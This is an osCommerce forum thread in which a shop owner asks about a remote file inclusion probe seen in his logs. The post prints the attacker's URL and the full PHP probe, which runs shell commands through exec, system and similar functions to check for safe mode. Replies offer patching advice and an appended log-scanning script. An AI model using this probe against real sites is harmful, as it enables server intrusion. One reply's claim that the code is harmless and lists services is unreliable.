Benjjj6 Posted March 25, 2008

Hi

This is the second time I have viewed someone via the Who's Online section of my site viewing this type of page. It showed them viewing this page "/index.php?c=http://gracegallery-stonefurniture.com/test_1.txt??"

Is this some kind of scan of my site? Should I be worried about it? Could someone view the test_1.txt file on that site and tell me if there is anything malicious in there?

Thanks, Ben

Guest Posted March 26, 2008

> Hi
>
> This is the second time I have viewed someone via the Who's Online section of my site viewing this type of page. It showed them viewing this page "/index.php?c=http://gracegallery-stonefurniture.com/test_1.txt??"
>
> Is this some kind of scan of my site? Should I be worried about it? Could someone view the test_1.txt file on that site and tell me if there is anything malicious in there?
>
> Thanks, Ben

If you did not put the file there, delete it and make sure you have applied all of the security updates.

Benjjj6 Posted March 26, 2008

Sorry, I guess I didn't explain myself fully. The file "test_1.txt??" is not hosted on my server, but rather on the server that the customer came from. On my site they were viewing this page:

http://www.mysite.com/index.php?c=http://gracegallery-stonefurniture.com/test_1.txt??

I have no relation to gracegallery-stonefurniture.com and am not sure why they would have input this URL. The .txt file contained this:

```php
<html><head><title>/\/\/\ Response CMD /\/\/\</title></head><body bgcolor=DC143C>
<H1>Changing this CMD will result in corrupt scanning !</H1>
</html></head></body>
<?php
if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){
    echo("Safe Mode of this Server is : ");
    echo("SafemodeOFF");
}
else{
    ini_restore("safe_mode");
    ini_restore("open_basedir");
    if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){
        echo("Safe Mode of this Server is : ");
        echo("SafemodeOFF");
    }else{
        echo("Safe Mode of this Server is : ");
        echo("SafemodeON");
    }
}
function ex($cfe){
    $res = '';
    if (!empty($cfe)){
        if(function_exists('exec')){
            @exec($cfe,$res);
            $res = join("\n",$res);
        }
        elseif(function_exists('shell_exec')){
            $res = @shell_exec($cfe);
        }
        elseif(function_exists('system')){
            @ob_start();
            @system($cfe);
            $res = @ob_get_contents();
            @ob_end_clean();
        }
        elseif(function_exists('passthru')){
            @ob_start();
            @passthru($cfe);
            $res = @ob_get_contents();
            @ob_end_clean();
        }
        elseif(@is_resource($f = @popen($cfe,"r"))){
            $res = "";
            while(!@feof($f)) { $res .= @fread($f,1024); }
            @pclose($f);
        }
    }
    return $res;
}
exit;
```

Is there anything malicious in this code? I hope that explained the situation better :thumbsup:

Guest Posted March 26, 2008

As far as I know it is an attempt to look for an old hole in osC. Just type the whole url into your browser. If a page or something comes up then you are in trouble. If you get a 403 or 404 error then you are okay. <--- as far as I know.

http://www.yourdomain.com/index.php?c=http...com/test_1.txt??

Always make sure you have the latest version and the latest updates installed.

Benjjj6 Posted March 26, 2008

It just loads the home page index.php. As I have Ultimate SEO URL's installed, and I believe the latest update redirects any products that no longer exist (403 or 404 errors) to the homepage, I think it means I am ok. :)

Thanks for your help Peter!

Guest Posted March 26, 2008

> It just loads the home page index.php. As I have Ultimate SEO URL's installed, and I believe the latest update redirects any products that no longer exist (403 or 404 errors) to the homepage, I think it means I am ok. :)
>
> Thanks for your help Peter!

Just ensure that you have all the latest security patches if you are not using 2.2rc2a.

Benjjj6 Posted March 26, 2008

Ok, I'm using the previous version of osCommerce before RC1 - where could I find these security patches?

Thank you too Leslie :)

Guest Posted March 26, 2008

> Just ensure that you have all the latest security patches if you are not using 2.2rc2a

I would also install the Security Pro contribution (cleanses the $GET) and Site Monitor (makes it much easier to find out what files have been added or altered on your site) and make sure all directories are 755 including images. Also make sure your robots.txt file is secure if you use one (another contribution), rename your admin, etc.

Guest Posted March 26, 2008

> Ok, I'm using the previous version of osCommerce before RC1 - where could I find these security patches?
>
> Thank you too Leslie :)

You will need to download RC2a and look in the extras folder. My tip would be to do one at a time, and test it. Always backup first.

arietis Posted March 26, 2008

> Is there anything malicious in this code?

there doesn't appear to be anything malicious in the code. that is, it won't do anything to hurt you. however, it's still bad.

it looks to me like it's an attempt to determine which system services are running. it uses the unix id or the windows net start command to do this. then, the list of these services is returned as a text file. this could be used by a hacker to determine which attacks can be used to hack into the server.

so by itself it's not bad, but the information that it reports could show someone that you're vulnerable to an attack. best to be sure that the attempt gives no information to the would-be hacker. the less information he has about you, the safer you are.
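
One way to find requests like the one discussed in this thread in a web server access log, added here as an example (not code from any poster or from osCommerce): it flags query-string parameters whose decoded value is a remote URL and records the response status, following the thread's rule of thumb that 403/404 is fine and anything else needs a manual look. The log lines, the `find_remote_url_params` name and the `allowed_params` allowlist are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample lines in Apache combined log format (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [25/Mar/2008:10:12:01 +0000] "GET /index.php?c=http://gracegallery-stonefurniture.com/test_1.txt?? HTTP/1.1" 200 15234 "-" "-"
198.51.100.4 - - [25/Mar/2008:10:13:44 +0000] "GET /index.php?cPath=3_10 HTTP/1.1" 200 18220 "-" "Mozilla/5.0"
203.0.113.9 - - [26/Mar/2008:02:40:19 +0000] "GET /index.php?c=hTTp%3A%2F%2Fexample.invalid%2Fprobe.txt%3F HTTP/1.1" 404 512 "-" "-"
198.51.100.8 - - [26/Mar/2008:09:01:02 +0000] "GET /redirect.php?action=url&goto=http%3A%2F%2Fwww.example.com HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

# client IP, timestamp, method, request target, status code
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')
# A parameter value that is itself a remote URL (scheme match is case-insensitive).
REMOTE_RE = re.compile(r'^\s*(?:https?|ftp)://', re.IGNORECASE)


def find_remote_url_params(log_text, allowed_params=frozenset()):
    """Return one record per query parameter whose value is a remote URL.

    allowed_params (assumption of this example) names parameters that
    legitimately carry URLs on the site and should not be reported.
    """
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format request line
        ip, when, _method, target, status = m.groups()
        for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            decoded = unquote(value)  # parse_qsl decodes once; this catches double encoding
            if name in allowed_params or not REMOTE_RE.match(decoded):
                continue
            hits.append({
                "ip": ip,
                "time": when,
                "param": name,
                "url": decoded,
                "status": int(status),
                # 403/404 means the request was refused; anything else gets a manual look.
                "needs_review": int(status) not in (403, 404),
            })
    return hits


if __name__ == "__main__":
    for hit in find_remote_url_params(SAMPLE_LOG, allowed_params={"goto"}):
        print(hit)
```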